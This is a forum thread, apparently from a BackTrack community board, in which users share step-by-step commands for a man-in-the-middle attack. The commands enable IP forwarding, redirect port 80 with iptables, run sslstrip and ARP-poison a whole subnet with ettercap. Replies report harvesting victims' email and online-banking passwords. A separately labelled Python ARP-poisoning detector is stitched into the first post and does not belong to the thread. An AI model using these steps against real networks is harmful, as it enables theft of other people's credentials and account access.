Page 1 of 2
Results 1 to 10 of 12

Thread: Ettercap & SslStrip (Attacking the Masses)

  1. #1
htons139 (Just burned his ISO)
    Join Date
    Sep 2008
    Posts
    23

    Default Ettercap & SslStrip (Attacking the Masses)

There are a couple of posts in here about using SSLstrip with arpspoof. This is working fine with my BT3 box, but it has some drawbacks:

    1- Arpspoof works on one target at a time, so if you are on a busy DHCP network, you have to use something like "netdiscover" in the passive mode and manually arpspoof new targets on the run.

    2-You can use:

    # arpspoof -i eth0 -t 192.168.0.255 192.168.0.1

where you ARP spoof the whole class C of your subnet, but guess what? The gateway will display an IP conflict warning message.

    3- Arpspoof is compiled with "eth0" as the device to use, even if you use "-i eth1" the attack will fail. You have to modify the arp.c file and compile arpspoof again to make it work on other NIC names or search for a compiled binary that has this issue resolved...

I would suggest following these steps (from the readme file included with the sslstrip package):

    a)Flip your machine into forwarding mode (as root):
    echo "1" > /proc/sys/net/ipv4/ip_forward

    b) Setup iptables to intercept HTTP requests (as root):
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <yourListenPort>

    c) Run sslstrip with the command-line options you'd like.
    python sslstrip.py -k -p -l <yourListenPort>

And instead of using arpspoof, use ettercap:

    d) Run ettercap to redirect traffic to your machine
    ettercap -i eth1 -Tq -M ARP /192.168.0.1/ // // -P autoadd

    We are telling ettercap to use "eth1", with terminal and quiet mode "-Tq" and use the arp poisoning attack "-M ARP". 192.168.0.1 is the gateway IP address and finally we are using the plugin autoadd to add new targets "-P autoadd".
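A defender-side check that fits the ARP poisoning step above: an added example, not code from this thread or from ettercap/sslstrip. It parses constructed tcpdump-style ARP reply lines and flags the two signals a full-duplex ARP poison leaves on the segment: the gateway IP moving to a new MAC, and one MAC answering for several IPs. The gateway address is the thread's 192.168.0.1; the MACs and host IPs are made-up sample values.

```python
import re
from collections import defaultdict

GATEWAY_IP = "192.168.0.1"  # gateway address used in the thread's example

# Constructed sample lines in tcpdump -n style ("ARP, Reply <ip> is-at <mac>").
# The MACs are made up; the last three lines show one station answering for the
# gateway and for two hosts, which is the pattern a two-sided ARP poison produces.
SAMPLE_ARP_LINES = """\
ARP, Reply 192.168.0.1 is-at 00:11:22:33:44:01, length 28
ARP, Reply 192.168.0.10 is-at 00:aa:bb:cc:dd:10, length 28
ARP, Reply 192.168.0.11 is-at 00:aa:bb:cc:dd:11, length 28
ARP, Request who-has 192.168.0.1 tell 192.168.0.10, length 28
ARP, Reply 192.168.0.1 is-at 00:de:ad:be:ef:99, length 28
ARP, Reply 192.168.0.10 is-at 00:de:ad:be:ef:99, length 28
ARP, Reply 192.168.0.11 is-at 00:de:ad:be:ef:99, length 28
"""

REPLY_RE = re.compile(r"Reply (\d+\.\d+\.\d+\.\d+) is-at ([0-9a-fA-F:]{17})")


def parse_arp_replies(text):
    """Yield (sender_ip, sender_mac) for every ARP reply line; requests are ignored."""
    for line in text.splitlines():
        m = REPLY_RE.search(line)
        if m:
            yield m.group(1), m.group(2).lower()


def detect_arp_poisoning(replies, gateway_ip=GATEWAY_IP, max_ips_per_mac=2):
    """Return alert strings for (a) an IP whose MAC changes, labelled GATEWAY when
    it is the gateway, and (b) a single MAC that claims more than max_ips_per_mac IPs."""
    ip_to_mac = {}
    mac_to_ips = defaultdict(set)
    alerts = []
    for ip, mac in replies:
        prev = ip_to_mac.get(ip)
        if prev is not None and prev != mac:
            label = "GATEWAY" if ip == gateway_ip else "host"
            alerts.append(f"{label} {ip} moved from {prev} to {mac}")
        ip_to_mac[ip] = mac
        mac_to_ips[mac].add(ip)
        if len(mac_to_ips[mac]) == max_ips_per_mac + 1:  # alert once, when the threshold is crossed
            alerts.append(f"MAC {mac} now answers for {sorted(mac_to_ips[mac])}")
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_poisoning(parse_arp_replies(SAMPLE_ARP_LINES)):
        print(alert)
```

A static gateway ARP entry on the clients, or an arpwatch-style monitor running this logic on a span port, is the usual mitigation and detection pair for this attack.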

  2. #2
kazalku (Member)
    Join Date
    Feb 2009
    Posts
    416

    Default

Quote Originally Posted by htons139:
    3- Arpspoof is compiled with "eth0" as the device to use, even if you use "-i eth1" the attack will fail. You have to modify the arp.c file and compile arpspoof again to make it work on other NIC names or search for a compiled binary that has this issue resolved...
    Just an alternative idea to simplify things - I'm sure that we can rename "eth1/rausb0" to "eth0" with a simple one line command. I did it earlier, but can't remember now. It could be with iwpriv or iwconfig or ifconfig or something simple. Will this 'rename' solve this problem??

  3. #3
htons139 (Just burned his ISO)
    Join Date
    Sep 2008
    Posts
    23

    Default

    Quoting from drakoth777
    {
    check out

    /etc/udev/rules.d

take a look at the network-devices.rules; each NIC has its own MAC address that is tied to a certain interface name (eth0, eth1, etc.). You can change all that in the network rules file.
    }


    If you get this working, you have to rename the eth0 to something else before renaming eth1 to eth0, on the practical level ettercap is the right tool. Or if arpspoof is easier for you, download the binary available in the forum. Search for "sslstrip & arpspoof"

  4. #4
kazalku (Member)
    Join Date
    Feb 2009
    Posts
    416

    Default

Thanks for the reply.... I don't mind using ettercap .... anyway...... for others' information, the following code required a slight change for me:

Quote Originally Posted by htons139:

    c) Run sslstrip with the command-line options you'd like.
    python sslstrip.py -K -P -l <yourListenPort>
    It worked as:
    Code:
    python sslstrip.py -k -p -l <yourListenPort>
    So, capital K & P were replaced by lower case.... btw i'm using BT3

  5. #5
htons139 (Just burned his ISO)
    Join Date
    Sep 2008
    Posts
    23

    Default

Quote Originally Posted by kazalku:
Thanks for the reply.... I don't mind using ettercap .... anyway...... for others' information, the following code required a slight change for me:
It worked as:
Code:
python sslstrip.py -k -p -l <yourListenPort>
So, capital K & P were replaced by lower case.... btw i'm using BT3
    welcome and yes, typing mistake, I corrected the initial post. cheers
    In a world where data is the coin of the realm, and transmissions are guarded by no better sentinels
    than man-made codes and corruptible devices, there is no such thing as a secret

  6. #6
kazalku (Member)
    Join Date
    Feb 2009
    Posts
    416

    Default

    Not a problem at all......
OK, now some feedback on the efficiency of the script. I used BT3 as attacker & Vista Home SP1 as victim. After poisoning, BT3 can successfully capture mail user IDs & passwords (like gmail.com, mail.com, yahoo.com) and internet banking IDs & passwords (like LloydsTSB, Barclays, HSBC). However, the victim can't log on to the internet bank account; even the 2nd security check page does not come up. So, it seems that our online banking is still safe...... any comments?

  7. #7
kazalku (Member)
    Join Date
    Feb 2009
    Posts
    416

    Default Patched??

I think it has been patched in both Firefox & IE. Does anybody think differently??
    If you can't explain it simply, you don't understand it well enough -- Albert Einstein

  8. #8

    Default

    Working for me:
    2009-01-10
    Firefox 3.5, Windows XP SP3
    http://forums.remote-exploit.org/bac...ettercap+https
    ~ Have you, g0tmi1k? ~

  9. #9
    Just burned his ISO
    Join Date
    May 2009
    Posts
    11

    Default

Quote Originally Posted by kazalku:
Not a problem at all......
OK, now some feedback on the efficiency of the script. I used BT3 as attacker & Vista Home SP1 as victim. After poisoning, BT3 can successfully capture mail user IDs & passwords (like gmail.com, mail.com, yahoo.com) and internet banking IDs & passwords (like LloydsTSB, Barclays, HSBC). However, the victim can't log on to the internet bank account; even the 2nd security check page does not come up. So, it seems that our online banking is still safe...... any comments?
    On top of banks (WellsFargo tested here) being secure, there is another "problem" with sslstrip. It should be using a favicon to put a fake "lock" symbol, ala SSL. However, the favicon is not on the web bar and some images have problems being sent to the victim's browser.

    What do banks have running that other SSL sites don't?

  10. #10
    Just burned his ISO
    Join Date
    Jul 2009
    Posts
    18

    Default thanks

After failing with arpspoof (when I have eth1 and it only works with eth0; otherwise it gives the "arpspoof couldn't arp for host" error),

I tried ettercap and it works like a champ.
My victim's machine is XP SP3 with IE8. It shows gmail accounts, bank accounts etc.

    thanks for posting
